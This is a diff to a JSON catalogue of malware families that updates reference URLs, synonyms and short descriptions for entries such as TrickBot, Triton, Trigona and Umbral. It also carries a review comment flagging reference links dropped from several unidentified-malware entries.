"https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx", + "https://therecord.media/trickbot-gang-shuts-down-botnet-after-months-of-inactivity/", + "https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html", + "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", + "https://medium.com/walmartglobaltech/anchor-and-lazarus-together-again-24744e516607", + "https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", + "https://www.cyberbit.com/latest-trickbot-variant-has-new-tricks-up-its-sleeve/", + "https://securityintelligence.com/trickbots-cryptocurrency-hunger-tricking-the-bitcoin-out-of-wallets/", + "https://www.justice.gov/opa/pr/multiple-foreign-nationals-charged-connection-trickbot-malware-and-conti-ransomware", + "https://www.microsoft.com/security/blog/2022/03/16/uncovering-trickbots-use-of-iot-devices-in-command-and-control-infrastructure/", + "https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6", + "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-adds-remote-application-credential-grabbing-capabilities-to-its-repertoire/", + "https://technical.nttsecurity.com/post/102fnog/targeted-trickbot-activity-drops-powerbrace-backdoor", + "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", + "https://www.secureworks.com/blog/trickbot-modifications-target-us-mobile-users", + "https://www.welivesecurity.com/wp-content/uploads/2021/02/ESET_Threat_Report_Q42020.pdf", + "https://www.proofpoint.com/us/blog/security-briefs/threat-actors-pair-tax-themed-lures-covid-19-healthcare-themes", + "https://threatresearch.ext.hp.com/detecting-a-stealthy-trickbot-campaign/", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", + 
"https://www.joesecurity.org/blog/498839998833561473", + "https://www.youtube.com/watch?v=EyDiIAt__dI", + "https://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors", + "https://krebsonsecurity.com/2020/10/attacks-aimed-at-disrupting-the-trickbot-botnet/", + "https://github.com/JR0driguezB/malware_configs/tree/master/TrickBot", + "https://eclypsium.com/2022/06/02/conti-targets-critical-firmware/", + "http://www.secureworks.com/research/threat-profiles/gold-blackburn", + "https://qmemcpy.io/post/reverse-engineering-malware-trickbot-part-2-loader", + "https://www.wired.co.uk/article/trickbot-malware-group-internal-messages", + "https://noticeofpleadings.com/trickbot/files/Complaint%20and%20Summons/2020-10-06%20Trickbot%201%20Complaint%20with%20exs.pdf", + "https://www.berlin.de/sen/justva/presse/pressemitteilungen/2020/pm-11-2020-t-systems-forensik_bericht_public_v1.pdf", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf", + "https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/trickbot-botnet-ransomware-disruption", + "https://thedfirreport.com/2021/05/02/trickbot-brief-creds-and-beacons/", + "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf", + "https://blog.morphisec.com/trickbot-uses-a-new-windows-10-uac-bypass", + "https://public.intel471.com/blog/partners-in-crime-north-koreans-and-elite-russian-speaking-cybercriminals/", + "https://blog.cyberint.com/ryuk-crypto-ransomware", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://www.lastline.com/labsblog/evolution-of-excel-4-0-macro-weaponization/", + 
"https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", + "https://www.bsi.bund.de/SharedDocs/Downloads/DE/BSI/Publikationen/Lageberichte/Lagebericht2020.pdf?__blob=publicationFile&v=2", + "https://www.microsoft.com/security/blog/2021/02/01/what-tracking-an-attacker-email-infrastructure-tells-us-about-persistent-cybercriminal-operations/", + "https://public.intel471.com/blog/trickbot-online-emotet-microsoft-cyber-command-disruption-attempts/", + "https://twitter.com/VK_Intel/status/1328578336021483522", + "https://labs.sentinelone.com/deep-dive-into-trickbot-executor-module-mexec-hidden-anchor-bot-nexus-operations/", + "https://arcticwolf.com/resources/blog/karakurt-web", + "https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/", + "https://www.europol.europa.eu/newsroom/news/12-targeted-for-involvement-in-ransomware-attacks-against-critical-infrastructure", + "https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", + "https://www.mandiant.com/media/12596/download", + "https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/", + "https://www.youtube.com/watch?v=lTywPmZEU1A", + "https://www.zscaler.com/blogs/research/trickbot-emerges-few-new-tricks", + "https://eclypsium.com/2020/12/03/trickbot-now-offers-trickboot-persist-brick-profit/", + "https://go.recordedfuture.com/hubfs/reports/cta-2021-1112.pdf", + "https://www.flashpoint-intel.com/blog/new-version-trickbot-adds-worm-propagation-module/", + "https://cybersecurity.att.com/blogs/labs-research/trickbot-bazarloader-in-depth", + "https://www.advanced-intel.com/post/trickbot-group-launches-test-module-alerting-on-fraud-activity", + "https://blog.malwarebytes.com/threat-intelligence/2021/11/trickbot-helps-emotet-come-back-from-the-dead/", + 
"https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes", + "https://blog.fraudwatchinternational.com/malware/trickbot-malware-works", + "https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/", + "https://www.fortinet.com/blog/threat-research/global-malicious-spam-campaign-using-black-lives-matter-as-a-lure", + "https://www.kryptoslogic.com/blog/2021/02/trickbot-masrv-module/", + "https://www.cert.pl/en/news/single/detricking-trickbot-loader/", + "https://www.gosecure.net/blog/2021/12/03/trickbot-leverages-zoom-work-from-home-interview-malspam-heavens-gate-and-spamhaus/", + "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/", + "https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/", + "https://blogs.vmware.com/networkvirtualization/2020/11/trick-or-threat-ryuk-ransomware-targets-the-health-care-industry.html/", + "https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf", + "https://unit42.paloaltonetworks.com/goodbye-mworm-hello-nworm-trickbot-updates-propagation-module/", + "https://securityaffairs.co/wordpress/128190/cyber-crime/conti-ransomware-takes-over-trickbot.html", + "https://www.webroot.com/blog/2018/03/21/trickbot-banking-trojan-adapts-new-module/", + "https://intel471.com/blog/a-brief-history-of-ta505", + "https://inquest.net/blog/2019/08/26/TrickBot-Memory-Analysis" ], "synonyms": [ "TheTrick", 
@@ -47975,12 +50227,14 @@ "value": "TrickBot" }, { - "description": "", + "description": "According to PCrisk, Trigona is ransomware that encrypts files and appends the \"._locked\" extension to filenames. Also, it drops the \"how_to_decrypt.hta\" file that opens a ransom note. An example of how Trigona renames files: it renames \"1.jpg\" to \"1.jpg._locked\", \"2.png\" to \"2.png._locked\", and so forth.\r\n\r\nIt embeds the encrypted decryption key, the campaign ID, and the victim ID in the encrypted files.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trigona", + "https://www.trendmicro.com/en_us/research/23/f/an-overview-of-the-trigona-ransomware.html", + "https://www.fortinet.com/blog/threat-research/ransomware-roundup-trigona-ransomware", "https://unit42.paloaltonetworks.com/trigona-ransomware-update/", - "https://www.fortinet.com/blog/threat-research/ransomware-roundup-trigona-ransomware" + "https://asec.ahnlab.com/en/51343/" ], "synonyms": [], "type": [] 
@@ -47993,25 +50247,25 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.triton", - "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf", - "https://www.eenews.net/stories/1060123327/", - "https://dragos.com/blog/trisis/TRISIS-01.pdf", - "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a", - "https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security", - "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html", - "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1538425180.pdf", - "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", - "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html", - "https://www.nozominetworks.com//downloads/US/Nozomi-Networks-TRITON-The-First-SIS-Cyberattack.pdf", - "https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics", - "https://www.ic3.gov/Media/News/2022/220325.pdf", - "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware", - "https://github.com/ICSrepo/TRISIS-TRITON-HATMAN", - "https://home.treasury.gov/news/press-releases/sm1162", - "https://securelist.com/apt-trends-report-q2-2019/91897/", - "https://us-cert.cisa.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20A%29_S508C.PDF", "https://www.cisa.gov/uscert/ncas/alerts/aa22-083a", - "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf" + "https://www.cisa.gov/uscert/ncas/alerts/aa22-110a", + "https://www.mandiant.com/resources/mandiant-red-team-emulates-fin11-tactics", + 
"https://www.domaintools.com/resources/blog/visibility-monitoring-and-critical-infrastructure-security", + "https://www.fireeye.com/blog/threat-research/2017/12/attackers-deploy-new-ics-attack-framework-triton.html", + "https://home.treasury.gov/news/press-releases/sm1162", + "https://github.com/ICSrepo/TRISIS-TRITON-HATMAN", + "https://www.cisa.gov/uscert/sites/default/files/publications/AA22-110A_Joint_CSA_Russian_State-Sponsored_and_Criminal_Cyber_Threats_to_Critical_Infrastructure_4_20_22_Final.pdf", + "https://www.ic3.gov/Media/News/2022/220325.pdf", + "https://www.sans.org/cyber-security-summit/archives/file/summit-archive-1538425180.pdf", + "https://www.eenews.net/stories/1060123327/", + "https://www.midnightbluelabs.com/blog/2018/1/16/analyzing-the-triton-industrial-malware", + "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://dragos.com/blog/trisis/TRISIS-01.pdf", + "https://www.nozominetworks.com//downloads/US/Nozomi-Networks-TRITON-The-First-SIS-Cyberattack.pdf", + "https://us-cert.cisa.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%20-%20Safety%20System%20Targeted%20Malware%20%28Update%20A%29_S508C.PDF", + "https://www.ironnet.com/blog/russian-cyber-attack-campaigns-and-actors", + "https://ics-cert.us-cert.gov/sites/default/files/documents/MAR-17-352-01%20HatMan%E2%80%94Safety%20System%20Targeted%20Malware_S508C.pdf" ], "synonyms": [ "HatMan", 
@@ -48027,20 +50281,20 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.trochilus_rat", - "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia", - "https://github.com/5loyd/trochilus/", - "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats", - "https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments", - "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf", "https://www.secureworks.com/research/threat-profiles/bronze-vinewood", + "https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html", + "https://github.com/5loyd/trochilus/", + "https://github.com/m0n0ph1/malware-1/tree/master/Trochilus", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/webworm-espionage-rats", "https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf", "https://www.secureworks.com/research/bronze-vinewood-targets-supply-chains", - "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", - "https://github.com/m0n0ph1/malware-1/tree/master/Trochilus", + "https://www.sstic.org/media/SSTIC2020/SSTIC-actes/pivoter_tel_bernard_ou_comment_monitorer_des_attaq/SSTIC2020-Slides-pivoter_tel_bernard_ou_comment_monitorer_des_attaquants_ngligents-lunghi.pdf", + 
"https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf", "https://app.box.com/s/z1uanuv1vn3vw5iket1r6bqrmlra0gpn", - "https://blogs.jpcert.or.jp/en/2017/04/redleaves---malware-based-on-open-source-rat.html", - "https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf" + "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf" ], "synonyms": [], "type": [] 
@@ -48053,16 +50307,16 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.troldesh", - "https://blog.avast.com/ransomware-strain-troldesh-spikes", - "https://www.zdnet.com/article/shade-troldesh-ransomware-shuts-down-and-releases-all-decryption-keys/", - "https://support.kaspersky.com/13059", "https://blogs.technet.microsoft.com/mmpc/2016/07/13/troldesh-ransomware-influenced-by-the-da-vinci-code/", - "https://labs.bitdefender.com/2020/05/shade-troldesh-ransomware-decryption-tool/", - "https://unit42.paloaltonetworks.com/shade-ransomware-hits-high-tech-wholesale-education-sectors-in-u-s-japan-india-thailand-canada/", - "https://blog.checkpoint.com/2015/06/01/troldesh-new-ransomware-from-russia/", - "https://isc.sans.edu/forums/diary/More+Russian+language+malspam+pushing+Shade+Troldesh+ransomware/24668/", - "https://securelist.com/the-shade-encryptor-a-double-threat/72087/", "https://github.com/shade-team/keys", + "https://blog.checkpoint.com/2015/06/01/troldesh-new-ransomware-from-russia/", + "https://support.kaspersky.com/13059", + "https://labs.bitdefender.com/2020/05/shade-troldesh-ransomware-decryption-tool/", + "https://isc.sans.edu/forums/diary/More+Russian+language+malspam+pushing+Shade+Troldesh+ransomware/24668/", + "https://blog.avast.com/ransomware-strain-troldesh-spikes", + "https://securelist.com/the-shade-encryptor-a-double-threat/72087/", + "https://unit42.paloaltonetworks.com/shade-ransomware-hits-high-tech-wholesale-education-sectors-in-u-s-japan-india-thailand-canada/", + "https://www.zdnet.com/article/shade-troldesh-ransomware-shuts-down-and-releases-all-decryption-keys/", "https://www.welivesecurity.com/2019/01/28/russia-hit-new-wave-ransomware-spam/" ], "synonyms": [ 
@@ -48137,13 +50391,13 @@ "value": "TUNNELFISH" }, { - "description": "", + "description": "According to Mitre, Turian is a backdoor that has been used by BackdoorDiplomacy to target Ministries of Foreign Affairs, telecommunication companies, and charities in Africa, Europe, the Middle East, and Asia. First reported in 2021, Turian is likely related to Quarian, an older backdoor that was last observed being used in 2013 against diplomatic targets in Syria and the United States. ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.turian", + "https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/", "https://unit42.paloaltonetworks.com/playful-taurus/", - "https://www.fortinet.com/blog/threat-research/analysis-of-follina-zero-day", - "https://www.welivesecurity.com/2021/06/10/backdoordiplomacy-upgrading-quarian-turian/" + "https://www.fortinet.com/blog/threat-research/analysis-of-follina-zero-day" ], "synonyms": [], "type": [] 
@@ -48169,13 +50423,13 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.turla_rpc", - "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", - "https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html", - "https://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html", - "https://unit42.paloaltonetworks.com/ironnetinjector/", - "https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html", "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", - "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf" + "https://unit42.paloaltonetworks.com/ironnetinjector/", + "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/", + "https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html", + "https://cocomelonc.github.io/malware/2022/09/20/malware-pers-11.html", + "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", + "https://cocomelonc.github.io/tutorial/2022/05/02/malware-pers-3.html" ], "synonyms": [], "type": [] @@ -48188,10 +50442,10 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.turla_silentmoon", - "https://twitter.com/Arkbird_SOLG/status/1304187749373800455", "https://www.emanueledelucia.net/the-bigboss-rules-something-about-one-of-the-uroburos-rpc-based-backdoors/", - "https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html", "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", + "https://cocomelonc.github.io/tutorial/2022/06/12/malware-pers-7.html", + "https://twitter.com/Arkbird_SOLG/status/1304187749373800455", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf" ], "synonyms": [ 
@@ -48210,11 +50464,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.turnedup", - "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", - "https://www.cyberbit.com/new-early-bird-code-injection-technique-discovered/", "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage", + "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html", "https://www.cyberbit.com/blog/endpoint-security/new-early-bird-code-injection-technique-discovered/", - "https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html" + "https://www.cyberbit.com/new-early-bird-code-injection-technique-discovered/" ], "synonyms": [ "Notestuk" @@ -48303,8 +50557,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme", - "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/", - "https://github.com/hfiref0x/UACME" + "https://github.com/hfiref0x/UACME", + "https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/" ], "synonyms": [ "Akagi" @@ -48319,8 +50573,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.udpos", - "https://threatmatrix.cylance.com/en_us/home/threat-spotlight-inside-udpos-malware.html", - "https://www.forcepoint.com/blog/x-labs/udpos-exfiltrating-credit-card-data-dns" + "https://www.forcepoint.com/blog/x-labs/udpos-exfiltrating-credit-card-data-dns", + "https://threatmatrix.cylance.com/en_us/home/threat-spotlight-inside-udpos-malware.html" ], "synonyms": [], "type": [] 
@@ -48357,6 +50611,19 @@ "uuid": "5e362cd1-bc5c-4225-b820-00ec7ebebadd", "value": "Uiwix" }, + { + "description": "Umbral is a data-stealing Trojan that targets Windows systems. It spreads through phishing emails and malicious attachments. Once installed, Umbral can steal a variety of data, including usernames, passwords, online banking credentials, and confidential files. It can also change computer settings and execute harmful commands. Umbral is a serious security threat and should be removed immediately if found.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.umbral", + "https://blog.cyble.com/2023/06/23/trojanized-super-mario-game-installer-spreads-supremebot-malware/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "449a8708-d0ec-40c8-af7c-ea6960d11659", + "value": "Umbral" + }, { "description": "", "meta": { @@ -48508,7 +50775,7 @@ "value": "Unidentified 029" }, { - "description": "", + "description": "According to enigmasoftware, FileCoder Trojans are Trojan infections that encrypt content on the victim's computer. FileCoder infections are a form of ransomware. Essentially, they take the victim's computer hostage, encrypting the victim's files and then demanding payment of a ransom in exchange for decrypting software", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_030", @@ -48672,8 +50939,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_058", - "https://securelist.com/the-evolution-of-brazilian-malware/74325/#rat", - "https://securelist.com/the-return-of-the-bom/90065/" + "https://securelist.com/the-return-of-the-bom/90065/", + "https://securelist.com/the-evolution-of-brazilian-malware/74325/#rat" ], "synonyms": [], "type": [] 
@@ -48691,7 +50958,7 @@ "type": [] }, "uuid": "969d1054-b917-4fb8-b3f8-1e33926fdb65", - "value": "Unidentified 061" + "value": "Unidentified 061 (Windows)" }, { "description": "This .net executable can receive commands from c2 sever, upload and download files according to the returned content, perform an uninstall, or modify the registry to achieve persistence across reboots. At the end, it downloads a Python-based RAT, called PeppyRAT.", @@ -48784,6 +51051,19 @@ "uuid": "f2979fee-603d-496e-a526-d622e9cba84f", "value": "Unidentified 072 (Metamorfo Loader)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_073", + "https://blog.certfa.com/posts/fake-interview-the-new-activity-of-charming-kitten/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "f049e626-7de2-4648-81db-53dfd34f2fab", + "value": "Unidentified 073 (Charming Kitten)" + }, { "description": "", "meta": { @@ -48801,8 +51081,7 @@ "description": "Unpacked http_dll.dat from the blog post.", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_075", - "https://blog.vincss.net/2020/03/re012-phan-tich-ma-doc-loi-dung-dich-COVID-19-de-phat-tan-gia-mao-chi-thi-cua-thu-tuong-Nguyen-Xuan-Phuc.html" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_075" ], "synonyms": [], "type": [] @@ -48816,8 +51095,8 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_076", "https://www.youtube.com/watch?v=8x-pGlWpIYI", - "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html", - "https://www.zscaler.com/blogs/research/return-higaisa-apt" + "https://www.zscaler.com/blogs/research/return-higaisa-apt", + "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html" ], "synonyms": [], "type": [] 
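Review bot: Several entries lose external reference URLs in this update with nothing added in their place: win.unidentified_075 (hunk -48801 here) keeps only its Malpedia link once the vincss.net analysis is dropped, win.unidentified_089 and win.unidentified_090 (hunks -48933 and -48949 in the following section) each lose two external write-ups, and win.unidentified_102 (hunk -49109) gains a description but loses the K7 and Morphisec links. The reshuffled ref ordering elsewhere suggests this file is regenerated from an upstream feed, so the removals may simply mirror upstream, but nothing in the commit says so and a cluster whose only ref is the Malpedia page has lost its primary-source evidence. If the deletions are unintentional, the previous `refs` arrays should be restored, e.g. for 075 keep `"https://blog.vincss.net/2020/03/re012-phan-tich-ma-doc-loi-dung-dich-COVID-19-de-phat-tan-gia-mao-chi-thi-cua-thu-tuong-Nguyen-Xuan-Phuc.html"` next to the Malpedia entry. Either way, a sentence in the commit description stating that refs are synced verbatim from upstream would make such deletions reviewable in future updates.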
@@ -48830,7 +51109,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_077", - "https://twitter.com/ccxsaber/status/1277064824434745345" + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048f", + "https://twitter.com/ccxsaber/status/1277064824434745345", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-north-korea-indictment" ], "synonyms": [], "type": [] 
@@ -48852,7 +51133,7 @@ "value": "Unidentified 078 (Zebrocy Nim Loader?)" }, { - "description": "This Trojan is a full-featured RAT capable of executing common tasks such as command execution and downloading/uploading files. This is implemented through a couple dozen C++ classes such as CMFile, CMFile, CMProcess, TFileDownload, TDrive, TProcessInfo, TSock, etc. The first stage custom installer utilizes the same classes. The Trojan uses HTTP Server API to filter HTTPS packets at port 443 and parse commands. \r\nIt is also used by attackers to gather a target’s data, make lateral movements and create SOCKS tunnels to their C2 using the Earthworm tunneler.Given that the Trojan is an HTTPS server itself, the SOCKS tunnel is used for targets without an external IP, so the C2 is able to send commands.", + "description": "This Trojan is a full-featured RAT capable of executing common tasks such as command execution and downloading/uploading files. This is implemented through a couple dozen C++ classes such as CMFile, CMFile, CMProcess, TFileDownload, TDrive, TProcessInfo, TSock, etc. The first stage custom installer utilizes the same classes. The Trojan uses HTTP Server API to filter HTTPS packets at port 443 and parse commands. \r\nIt is also used by attackers to gather a target\u2019s data, make lateral movements and create SOCKS tunnels to their C2 using the Earthworm tunneler.Given that the Trojan is an HTTPS server itself, the SOCKS tunnel is used for targets without an external IP, so the C2 is able to send commands.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_080", 
@@ -48933,9 +51214,7 @@ "description": "Downloader used in suspected APT attack against Vietnam.", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_089", - "https://kienmanowar.wordpress.com/2022/01/26/quicknote-analysis-of-malware-suspected-to-be-an-apt-attack-targeting-vietnam/", - "https://research.checkpoint.com/2023/pandas-with-a-soul-chinese-espionage-attacks-against-southeast-asian-government-entities/" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_089" ], "synonyms": [ "5.t Downloader" @@ -48949,9 +51228,7 @@ "description": "Recon/Loader malware attributed to Lazarus, disguised as Notepad++ shell extension.", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_090", - "https://cybergeeks.tech/a-detailed-analysis-of-lazarus-malware-disguised-as-notepad-shell-extension/", - "https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_090" ], "synonyms": [], "type": [] @@ -49003,9 +51280,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_094", - "https://twitter.com/katechondic/status/1556940169483264000" + "https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html", + "https://twitter.com/katechondic/status/1556940169483264000", + "https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html", + "https://www.lac.co.jp/lacwatch/report/20221117_003189.html" + ], + "synonyms": [ + "ClaimLoader", + "PUBLOAD" ], - "synonyms": [], "type": [] }, "uuid": "db8f94e9-768d-4ad1-befb-55b4b820174f", 
@@ -49043,8 +51326,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_097", - "https://www.bleepingcomputer.com/news/security/hacking-group-polonium-uses-creepy-malware-against-israel/", - "https://www.welivesecurity.com/2022/10/11/polonium-targets-israel-creepy-malware/" + "https://www.welivesecurity.com/2022/10/11/polonium-targets-israel-creepy-malware/", + "https://www.bleepingcomputer.com/news/security/hacking-group-polonium-uses-creepy-malware-against-israel/" ], "synonyms": [], "type": [] @@ -49100,7 +51383,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_101", - "https://twitter.com/RedDrip7/status/1595365451495706624" + "https://twitter.com/RedDrip7/status/1595365451495706624", + "https://securelist.com/bluenoroff-methods-bypass-motw/108383/" ], "synonyms": [], "type": [] @@ -49109,12 +51393,10 @@ "value": "Unidentified 101 (Lazarus?)" }, { - "description": "", + "description": "Donot malware is a sophisticated, high-level malware toolkit designed to collect and exfiltrate information from vulnerable systems. It has been used in targeted attacks against government and military organizations in Asia. Donot malware is highly complex and well-crafted, and it poses a serious threat to information security.", "meta": { "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_102", - "https://labs.k7computing.com/index.php/the-donot-apt/", - "https://blog.morphisec.com/apt-c-35-new-windows-framework-revealed" + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_102" ], "synonyms": [], "type": [] 
